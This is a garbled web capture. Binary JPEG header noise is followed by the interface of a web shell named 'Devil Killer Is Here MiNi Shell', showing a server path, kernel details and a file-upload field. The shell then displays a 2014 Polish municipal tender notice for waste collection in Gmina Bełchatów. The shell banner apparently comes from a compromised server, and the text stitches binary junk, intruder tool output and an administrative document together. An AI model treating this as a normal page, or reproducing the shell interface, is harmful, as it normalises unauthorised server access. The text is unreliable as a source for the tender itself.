JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140612/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140612/198670-N-2014.html

<p class="kh_header"><b>Bełchatów: Odbiór odpadów komunalnych pochodzących z nieruchomości zamieszkałych na terenie gminy Bełchatów wraz z ich transportem i zagospodarowaniem.</b><br>
<b>Numer ogłoszenia: 198670 - 2014; data zamieszczenia: 12.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bełchatów , ul. Kościuszki 13, 97-400 Bełchatów, woj. łódzkie, tel. 44 6325211 w. 34, faks 44 6326854.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugbelchatow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór odpadów komunalnych pochodzących z nieruchomości zamieszkałych na terenie gminy Bełchatów wraz z ich transportem i zagospodarowaniem..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
Przedmiotem zamówienia jest usługa polegająca na odbiorze i zagospodarowaniu odpadów komunalnych pochodzących od właścicieli nieruchomości położonych na terenie Gminy Bełchatów w okresie  od 01.07.2014 r. do 30.06.2015 r.
Przedmiot zamówienia podzielony został na trze części zwane dalej zadaniami. Zakres zamówienia dotyczy posesji zamieszkałych. 
Zadanie nr 1	
Odbieranie i zagospodarowanie odpadów komunalnych pochodzących od właścicieli nieruchomości, na których zamieszkują mieszkańcy z terenu Gminy Bełchatów oraz wyposażenie wszystkich właścicieli nieruchomości w pojemniki na odpady. System odbierania odpadów komunalnych nie obejmuje odpadów powstających w wyniku prowadzenia działalności gospodarczej. 
W ramach niniejszego zamówienia Wykonawca zobowiązany jest bezpośrednio z nieruchomości odbierać i zagospodarować następujące rodzaje odpadów, sklasyfikowane kodami: 
1. Niesegregowane /zmieszane/ odpady komunalne  - 20 03 01.
2. Segregowane odpady komunalne z podziałem na następujące frakcje:
             - papier i tektura - 20 01 01, 15 01 01;
             - tworzywa sztuczne - 20 01 39, 15 01 02;
             - metal - 20 01 40, 15 01 04;
             - opakowania wielomateriałowe - 15 01 05.
szkło - 20 01 02, 15 01 07;
zużyte baterie i akumulatory - 20 01 34 /małogabarytowe/;
Obowiązek zapewnienia pojemników
1. Wykonawca jest zobowiązany zapewnić pojemniki na odpady komunalne i ustawić je na terenie nieruchomości na czas realizacji przedmiotowego zamówienia bez dodatkowych opłat ze strony właściciela nieruchomości i Zamawiającego. Pojemniki na odpady powinny być przystosowane do opróżniania mechanicznego. Ilość i wielkość pojemników służących do gromadzenia odpadów komunalnych będzie dostosowana do liczby osób zamieszkujących daną nieruchomość w następujący sposób: 
1. Jeden pojemnik o pojemności 0,12 m3 na zmieszane odpady komunalne dla nieruchomości, którą zamieszkują od 1 do 6 osób włącznie, na której jest prowadzona segregacja u źródła;
2. Jeden pojemnik o pojemności 0,24 m3 na odpady suche /papier, tworzywa sztuczne, opakowania wielomateriałowe, metal/ dla nieruchomości, którą zamieszkują od 1 do 6 osób włącznie, na której jest prowadzona segregacja u źródła;
3. Jeden pojemnik o pojemności 0,12 m3 na szkło w formie zmieszanej dla nieruchomości, którą zamieszkują od 1 do 6 osób włącznie, na której jest prowadzona segregacja u źródła;
4. Jeden pojemnik o pojemności 0,24 m3 na zmieszane odpady komunalne dla nieruchomości, którą zamieszkują od 7 do 12 osób włącznie, na której jest prowadzona segregacja u źródła;
5. Jeden pojemnik o pojemności 0,48 m3 lub dwa pojemniki o pojemności 0,24 m3 na odpady suche /papier, tworzywa sztuczne, opakowania wielomateriałowe, metal/ dla nieruchomości, którą zamieszkują od 7 do 12 osób włącznie, na której jest prowadzona segregacja u źródła;
6. Jeden pojemnik o pojemności 0,24 m3 lub 2 pojemniki o pojemności 0,12 m3 na szkło w formie zmieszanej dla nieruchomości, którą zamieszkują od 7 do 12 osób włącznie, na której jest prowadzona segregacja u źródła;
7. Dla nieruchomości, na której zamieszkuje powyżej 12 osób zastosowanie ma zestaw pojemników taj jak w pkt. 4, 5 i 6 oraz dodatkowo jeden pojemnik o pojemności 0,24 m3 na zmieszane odpady komunalne, jeden pojemnik o pojemności 0,48 m3 na odpady suche /papier, tworzywa sztuczne, opakowania wielomateriałowe, metal/ oraz jeden pojemnik o pojemności 0,24 m3 na szkło w formie zmieszanej na każde kolejne 6 osób;
8. W zabudowie jednorodzinnej zamieszkałej przez 1 - 4 osoby, na której nie jest prowadzona segregacja u źródła pojemnik o pojemności 0,24 m3 na zmieszane odpady komunalne;
9. W zabudowie jednorodzinnej zamieszkałej przez więcej niż 4 osoby, na której nie jest prowadzona segregacja u źródła pojemnik o pojemności 0,24 m3 oraz dodatkowo jeden pojemnik o pojemności 0,12 m3 na każde kolejne dwie osoby;
10. Pojemniki i pergole śmietnikowe oraz pojemniki w gniazdach do selektywnej zbiórki dostosowane do ilości osób zamieszkujących daną nieruchomość w zabudowie wielorodzinnej przy uwzględnieniu, że na jednego mieszkańca przypada 0,08 m3 odpadów w skali miesiąca;
Pojemniki o których mowa w pkt. 1 powinny być wykonane z twardego tworzywa sztucznego, odpowiadać aktualnie obowiązującym w Polsce normom oraz być czyste, nieuszkodzone i sprawnie technicznie. 
Dane wskazujące liczbę osób zamieszkujących daną nieruchomość umieszczone są w wykazie  złożonych deklaracji, który jest  zawarty w pkt. pn. - /Informacje dodatkowe, istotne z punktu widzenia zamówienia/. Dane nie są zależne od Zamawiającego i będą one na bieżąco aktualizowane przez Zamawiającego. Podane ilości są szacunkowe i mogą ulec zmianie stosownie do rzeczywistych potrzeb Zamawiającego uwzględniając powstawanie nowych nieruchomości oraz migrację ludności. Zamawiający w dniu podpisania umowy przekaże Wykonawcy szczegółowy wykaz nieruchomości objętych zbiórką odpadów komunalnych wraz z informacją o ilości osób zamieszkujących nieruchomość i sposobie zbierania odpadów /selektywnie bądź nieselektywnie/. 
2. Wykonawca jest zobowiązany do dostarczenia mieszkańcom bezpośrednio na posesję pojemników na odpady zgodnie z wykazem złożonych deklaracji w terminie od dnia podpisania umowy do dnia 01.07.2014 r. Wykonawca zobowiązany jest przedłożyć Zamawiającemu raport o ilości i rodzaju pojemników znajdujących się na poszczególnych nieruchomościach na dzień 01.07.2014 r. wraz z informacją o posesjach, do których pojemników nie dostarczono /z podaniem przyczyny niedostarczenia/. Za przyczyny niezależne od Wykonawcy można będzie uznać w szczególności co najmniej trzykrotne nie zastanie właściciela nieruchomości pod wskazanym adresem w odstępach co najmniej trzydniowych w godzinach 7:00 - 20:00.  W przypadku gdy mieszkaniec złoży nową deklarację, dokona jej korekty lub złoży zapotrzebowanie na usługę dodatkową, wówczas Zamawiający poinformuje drogą elektroniczną Wykonawcę o zaistniałej sytuacji. Jednocześnie zobowiązuje się Wykonawcę do dostarczania i wymiany pojemników w każdy poniedziałek danego miesiąca. Jeżeli dzień dostarczenia bądź wymiany pojemników przypada na dzień świąteczny lub wolny od pracy, wówczas pojemniki należy dostarczyć lub wymienić w pierwszy dzień roboczy następujący po tym dniu.
Dodatkowo zwiększone ilości niesegregowanych /zmieszanych/ odpadów komunalnych lub pozostałości z segregowania odpadów komunalnych /niemieszczące się w pojemnikach/ Wykonawca odbierze w workach, które właściciel nieruchomości będzie mógł odebrać w Urzędzie Gminy. Wykonawca będzie dostarczał do siedziby Zamawiającego worki na odpady w partiach /100 szt./, według bieżących potrzeb Zamawiającego, przy czym każdorazowo zamówiona partia worków dostarczona będzie przez Wykonawcę w terminie 3 dni do dnia otrzymania stosownego zamówienia od Zamawiającego, pisemnie, faksem lub drogą elektroniczną. Worki powinny być wykonane z folii polietylenowej LDPE o pojemności 120 l i grubości min. 60 mikronów zapewniającej odporność na rozerwanie, bez dodatku kadmu, ołowiu i innych pierwiastków szkodliwych dla środowiska, odporne na działanie promieni UV, niskich temperatur oraz środków chemicznych z logiem Wykonawcy. Zamawiający przewiduje, że dostarczone partie worków na odpady będą stanowiły do 2%  wartości zamówienia. 
3. Jeżeli podczas odbierania odpadów dojdzie do uszkodzenia lub zniszczenia pojemników 
z winy Wykonawcy, Wykonawca zobowiązany będzie do wymiany uszkodzonego pojemnika na własny koszt.
UWAGA! Wykonawca ubezpieczy na własny koszt pojemniki do odbierania odpadów komunalnych  i zabezpieczy je od ryzyka związanego z uszkodzeniem, zdarzeniem losowym /np. Pożar/.
Wykonawca zobowiązany będzie do świadczenia usług dodatkowych na wniosek Właściciela nieruchomości składany w Urzędzie Gminy w zakresie odbioru dodatkowych ilości odpadów nie mieszczących się w pojemnikach ustawionych na nieruchomości oraz odpadów budowlanych i rozbiórkowych /powyżej ilości, które właściciel nieruchomości może przekazać do PSZOK/. Usługa dodatkowa będzie obejmować:
a) dodatkowy cykliczny wywóz zmieszanych odpadów komunalnych w pojemniku 120 L;
b) dodatkowy cykliczny wywóz zmieszanych odpadów komunalnych w pojemniku 240 L;
c) dodatkowy cykliczny wywóz zmieszanych odpadów komunalnych  w pojemniku 1,1 m3;
d) dodatkowy jednorazowy wywóz zmieszanych odpadów komunalnych  w kontenerze 5 m3 - 7,5 m3;
e) dodatkowy cykliczny wywóz szkła w formie zmieszanej zgromadzonego w pojemniku 120 L;
f) dodatkowy cykliczny wywóz odpadów suchych /papier, tworzywa sztuczne, opakowania wielomateriałowe, metal/ zgromadzonych w pojemniku 240 L;
g) dodatkowy jednorazowy wywóz odpadów /nie zawierających frakcji materiałów izolacyjnych/ zgromadzonych w kontenerze 5 m3 - 7,5  m3;
h) dodatkowy jednorazowy wywóz odpadów /zawierających frakcję materiałów izolacyjnych/ zgromadzonych w kontenerze 5 m3 - 7,5  m3.
W przypadku gdy Zamawiający zgłosi Wykonawcy zapotrzebowanie na dostarczenie kontenera w ramach usług dodatkowych wówczas Wykonawca zobowiązuje się do dostawy kontenerów na wskazane nieruchomości w terminie 48 h od otrzymanego zgłoszenia.
Cena ofertowa za realizację przedmiotu zamówienia  nie obejmuje świadczenia usług dodatkowych.
Częstotliwość i zasady odbioru i wywozu odpadów
1.Odpady komunalne będą odbierane z nieruchomości z następującą częstotliwością zgodną
z Regulaminem utrzymania czystości i porządku na terenie gminy Bełchatów:
Niesegregowane /zmieszane/ odpady komunalne - 1 raz w miesiącu, w terminie zgodnym z obowiązującym harmonogramem odbioru odpadów, od godziny 600;
Segregowane odpady komunalne:
- Surowce suche /papier i tektura, tworzywa sztuczne, metal, opakowania wielomateriałowe/- 1 raz w miesiącu, w terminie zgodnym z obowiązującym harmonogramem odbioru odpadów, od godziny 600;
- Opakowania szklane - 1 raz na kwartał, w terminie zgodnym z obowiązującym harmonogramem odbioru odpadów , od godziny 600;
- Baterie i akumulatory /małogabarytowe/ - 1 raz na kwartał, w terminie zgodnym z obowiązującym harmonogramem odbioru odpadów, od godziny 600. 
Wykonawca jest zobowiązany do odbioru zmieszanych odpadów komunalnych umieszczonych w workach
i wystawionych  przy  pojemnikach  zgodnie z harmonogramem odbioru odpadów zmieszanych.
2. Zamawiający i Wykonawca wspólnie odpowiadają za informowanie mieszkańców o zasadach
i terminach odbierania poszczególnych rodzajów odpadów. W tym celu Wykonawca będzie sporządzać harmonogram odbioru, który Zamawiający po akceptacji będzie publikował na stronie internetowej, a Wykonawca w formie kolorowych wydruków będzie zobowiązany do dostarczenia do wszystkich nieruchomości zamieszkałych do dnia 30.06.2014. Na harmonogramie powinna być umieszczona informacja o konieczności wystawienia pojemników na odpady do godziny 600. Wykonawca powinien umieścić harmonogram na własnej stronie internetowej i eksponować go przez cały okres obowiązywania umowy.
UWAGA! Dodatkowo Wykonawca zobowiązuje się do dostarczenia do siedziby Urzędu Gminy Bełchatów harmonogramu odbioru odpadów komunalnych w postaci kolorowych wydruków po 50 szt. dla każdej trasy. 
Kontrola obowiązku segregowania odpadów
1. Wykonawca zobowiązany jest do monitorowania właścicieli nieruchomości pod kątem wypełniania obowiązku w zakresie selektywnego zbierania odpadów komunalnych. 
2. W przypadku gdy właściciel nieruchomości, który zadeklarował, że odpady będą gromadzone w sposób selektywny, wystawia je w sposób zmieszany Wykonawca odbiera odpady jako zmieszane. W takim przypadku Wykonawca umieszcza na pokrywie pojemnika znacznik /np. samoprzylepną kartką/ informujący właściciela nieruchomości o otrzymaniu ostrzeżenia za nie przestrzeganie obowiązku segregowania odpadów.   
3. Jeżeli upomnienie to nie przyniesie skutku i sytuacja taka się powtórzy, o zaistniałej sytuacji Wykonawca zawiadamia Zamawiającego drogą elektroniczną, faxem  lub pisemnie, w terminie do 3 dni roboczych. Do zawiadomienia Wykonawca dołącza  protokół określający: dzień wywozu, miejscowość i numer posesji oraz krótki opis obrazujący podstawę udzielenia ostrzeżenia właścicielowi nieruchomości. Do protokołu zobowiązany jest dołączyć również dokumentację fotograficzną. 
Zadanie 2
Utrzymanie i Obsługa Punktu Selektywnego Zbierania Odpadów Komunalnych, wyposażenie 
w odpowiednie pojemniki do gromadzenia odpadów, odbieranie i zagospodarowanie odpadów komunalnych w nim gromadzonych. Punkt zlokalizowany jest w miejscowości Zawady, 
97 - 400 Bełchatów, a właścicielem punktu jest Gmina Bełchatów. 
Zakres przedmiotu zamówienia obejmuje:
1) Odbiór i zagospodarowanie następujących odpadów:
Przeterminowanych leków o kodzie 20 01 32,
Chemikaliów (farby, rozpuszczalniki, oleje opadowe) o kodach 20 01 13, 20 01 14, 20 01 15, 20 01 19, 20 01 27, 20 01 29, 20 01 28, 20 01 30;
Zużytych baterii i akumulatorów o kodzie 20 01 34;
Zużytego sprzętu elektrycznego i elektronicznego o kodach 20 01 23, 20 01 35, 20 01 36;
Odpadów wielkogabarytowych o kodzie 20 03 07;
Odpadów budowlano - rozbiórkowych o kodach z grupy 17;
Zużytych opon o kodzie 16 01 03;
Odpadów zielonych o kodzie 20 02 01;
Odzież o kodzie 20 01 10;
Opakowań ze szkła o kodzie 15 01 07;
Opakowań z tworzyw sztucznych o kodzie 15 01 02;
Opakowań z papieru i tektury o kodzie 15 01 01;
Odpadów komunalnych nie wymienionych w innych podgrupach /popiół, żużel/ o kodzie 20 03 99.
2) Zapewnienie pracownika oraz pracy Punktu Selektywnego Zbierania Odpadów 
w następujących dniach i godzinach: 
- w okresie od listopada do marca we wtorki i czwartki w godzinach 900 - 1700
- w okresie od kwietnia do października we wtorki i czwartki w godzinach 1100 - 1900
- przez cały rok w każdą sobotę miesiąca w godzinach 09:00 - 13:00.
Dopuszcza się możliwość zmiany godzin funkcjonowania PSZOK za zgodą Zamawiającego i Wykonawcy.
3) W przypadku nieobecności pracownika obsługującego Punkt Wykonawca zobowiązany jest zapewnić zastępstwo pracownika i umożliwić normalne funkcjonowanie Punktu. 
4) Pokrywanie przez Wykonawcę wszelkich kosztów związanych z obsługą i utrzymaniem Punktu.
5) Prowadzenie działalności propagującej funkcjonowanie Punktu.
6) Wykonawca zobowiązany będzie do przekazywania Zamawiającemu, raportu zawierającego:
- informacje o rodzaju, kodzie, masie lub ilości odebranych odpadów.
- informacje o dacie ich dostarczenia do punktów oraz sposobie ich dalszego wykorzystania. Raporty należy przedkładać wraz z fakturą.
7) Wykonawca, z którym zostanie podpisana umowa, zobowiązany będzie do przejęcia Punktu Selektywnego Zbierania Odpadów Komunalnych  od właściciela w dniu 01.07.2014 r. i zdania go Zamawiającemu w dniu 30.06.2015 r. Przejęcie i zdanie punktu odbywać się będzie w oparciu o protokół zdawczo-odbiorczy, którego kopie realizujący zamówienie przekaże Zamawiającemu. Przekazanie protokołu jest warunkiem ostatecznego rozliczenia się  z Wykonawcą.
8) Wykonawca zobowiązany jest do  sukcesywnego wywozu odpadów z Punktu Selektywnego Zbierania Odpadów Komunalnych tak aby zapewnić możliwość ciągłego dostarczania odpadów przez mieszkańców. Wykonawca jest zobowiązany do opróżnienia pojemników/kontenerów po otrzymaniu zgłoszenia od pracownika PSZOK w terminie 2 dni roboczych od dnia otrzymania zgłoszenia.
Zadanie 3
Obsługa systemu obwoźnej zbiórki odpadów wielkogabarytowych, pochodzących z gospodarstw domowych położonych na terenie Gminy Bełchatów zgodnie z harmonogramem, dwa razy 
w okresie objętym niniejszym zamówieniem.
Zakres przedmiotu zamówienia obejmuje: 
1) Odebranie wystawionych przed nieruchomościami następujących rodzajów odpadów:
- Odpady wielkogabarytowe /wersalki, tapczany, łóżka, fotele, elementy stolarki, okna, dywany, wykładziny, meble;
- Złom metalowy /rynny, rury, blachy, piece/;
- Zużyte urządzenia elektryczne i elektroniczne /telewizory, monitory, pralki, kuchenki radia, drukarki, odkurzacze oraz inny sprzęt RTV i AGD/;
- Opakowania z tworzyw sztucznych /beczki, skrzynki, wiadra/;
- Urządzenia zawierające freony /lodówki/;
- Zużyte opony /z pojazdów osobowych i maszyn rolniczych/;
- Baterie i akumulatory,
- Odpady ulegające biodegradacji /gałęzie, listwy drewniane, deski, płyty wiórowe/;
2) Załadunek na środek transportu;
3) Przewóz odpadów na trasie punkt zbiórki - wyspecjalizowany odbiorca /w tym rozładunek
u odbiorcy;
4) Zagospodarowanie odebranych odpadów;
5) Naprawę szkód powstałych w trakcie wykonywania czynności;
6) Ponadto Wykonawca zobowiązany będzie do przekazywania Zamawiającemu raportu, zawierającego miedzy innymi informacje o rodzaju, kodzie, masie lub ilości odebranych odpadów, dacie ich odebrania oraz sposobie ich dalszego wykorzystania;
7) Opracowanie przez Wykonawcę szczegółowego harmonogramu wykonania usługi na danym terenie.
8) Uzyskanie akceptacji harmonogramu przez  Urząd Gminy Bełchatów najpóźniej na 30 dni przed wyznaczonym terminem wykonania usługi;
Zbiórka nie obejmuje odpadów powstałych w trakcie prowadzonej działalności przez podmioty gospodarcze. Odpady wielkogabarytowe w ramach zbiórki objazdowej będą odbierane z częstotliwością zgodną  z Regulaminem utrzymania czystości i porządku na terenie Gminy /2 razy w okresie objętym niniejszym zamówieniem/.
Informacje dodatkowe istotne z punktu widzenia zamówienia:
1. Liczba złożonych deklaracji wg stanu an dzień 30.04.2014 r. wynosi 3120.
2. Na terenie Gminy Bełchatów ok. 97% nieruchomości zamieszkałych zadeklarowało selektywną zbiórkę odpadów.
3. Ilość odpadów odebranych z terenu Gminy Bełchatów na podstawie sprawozdań składanych przez przedsiębiorców uprawnionych do odbioru odpadów komunalnych w 2013 roku wynosiła:
Kod odebranych odpadów komunalnych4)
Rodzaj odebranych odpadów komunalnych4)
Masa odebranych odpadów komunalnych5) [Mg]
20 03 01
Nie segregowane /zmieszane odpady komunalne/ 836,88
20 02 01 
Odpady ulegające biodegradacji
19,8
15 01 01 
Opakowania z papieru i tektury
11,2
15 01 02
Opakowania z tworzyw sztucznych
32
15 01 04 
Opakowania z metali
0
15 01 05 
Opakowania wielomateriałowe
1,1
15 01 06
Zmieszane odpady opakowaniowe
131,6
15 01 07 
Opakowania ze szkła
236,1
16 01 03
Zużyte opony
19,1
17 01 07 
Zmieszane odpady z  betonu, gruzu ceglanego, odpadowych materiałów ceramicznych i elementów wyposażenia inne niż wymienione w 17 01 06
7,4
20 01 01
Papier i tektura
10,5
20 01 10 
Odzież
0,6
20 01 23
Urządzenia zawierające freony
0,1
20  01 36
Zużyte urządzenia elektryczne i elektroniczne inne niż wymienione w 20 01 21, 20 01 23, 20 01 35
0,2
15 01 38
Drewno inne niż niż wymienione w 20 01 37
1,8
20 01 39
Tworzywa sztuczne
7,3
20 03 07
Odpady wielkogabarytowe
96,7
20 02 03
Inne odpady nieulegające biodegradacji
2,36
20 03 99
Odpady komunalne niewymienione w innych podgrupach
3,3

Uwaga: Ilość wytworzonych i odebranych z terenu Gminy Bełchatów odpadów nie jest zależna od Zamawiającego. Podane wyżej ilości odpadów należy traktować jako orientacyjne i Wykonawcy nie przysługuje prawo dodatkowego wynagrodzenia czy odszkodowania za osiągnięcie innych wielkości.
Wykonawca zobowiązany będzie do prowadzenia i przekazania Zamawiającemu  dokumentacji związanej z przedmiotem zamówienia, określonej w Rozdziale III SIWZ Opis przedmiotu zamówienia. Z uwagi na przekroczenie dopuszczalnego limitu znaków w ogłoszeniu zamawiający rozszerzył opis przedmiotu zamówienia w SIWZ..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, na podstawie art. 67 ust. 1 pkt 6 ustawy Pzp, polegających na zobowiązaniu Wykonawcy do świadczenia usług dodatkowych na wniosek Właściciela nieruchomości składany w Urzędzie Gminy
w zakresie odbioru dodatkowych ilości odpadów nie mieszczących się w pojemnikach ustawionych na nieruchomości oraz odpadów budowlanych i rozbiórkowych /powyżej ilości, które właściciel nieruchomości może przekazać do PSZOK/. 
Usługa uzupełniająca będzie obejmować:
a) dodatkowy cykliczny wywóz zmieszanych odpadów komunalnych w pojemniku 120 L;
b) dodatkowy cykliczny wywóz zmieszanych odpadów komunalnych w pojemniku 240 L;
c) dodatkowy cykliczny wywóz zmieszanych odpadów komunalnych  w pojemniku 1,1 m3;
d) dodatkowy jednorazowy wywóz zmieszanych odpadów komunalnych  w kontenerze 5 m3 - 7,5 m3;
e) dodatkowy cykliczny wywóz szkła w formie zmieszanej zgromadzonego
w pojemniku 120 L;
f) dodatkowy cykliczny wywóz odpadów suchych /papier, tworzywa sztuczne, opakowania wielomateriałowe, metal/ zgromadzonych w pojemniku 240 L;
g) dodatkowy jednorazowy wywóz odpadów /nie zawierających frakcji materiałów izolacyjnych/ zgromadzonych w kontenerze 5 m3 - 7,5  m3;
h) dodatkowy jednorazowy wywóz odpadów /zawierających frakcję materiałów izolacyjnych/ zgromadzonych w kontenerze 5 m3 - 7,5  m3.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.20.00-9, 90.51.31.00-7, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1) Zamawiający wymaga złożenia wadium, w wysokości: 15.000,00 zł, słownie:  piętnaście tysięcy złotych.
2) Wadium należy wnieść w terminie do dnia 23.06.2014r. do godz. 10.30.
3) Wadium może być wnoszone w jednej lub kilku następujących formach: 
	1) pieniądzu;
	2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-	kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
	3) gwarancjach bankowych,
	4) gwarancjach ubezpieczeniowych, 
	5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2	ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju  	Przedsiębiorczości (t.j. Dz. U. z 2007 r. Nr 42, poz. 275, z późn. zm.).

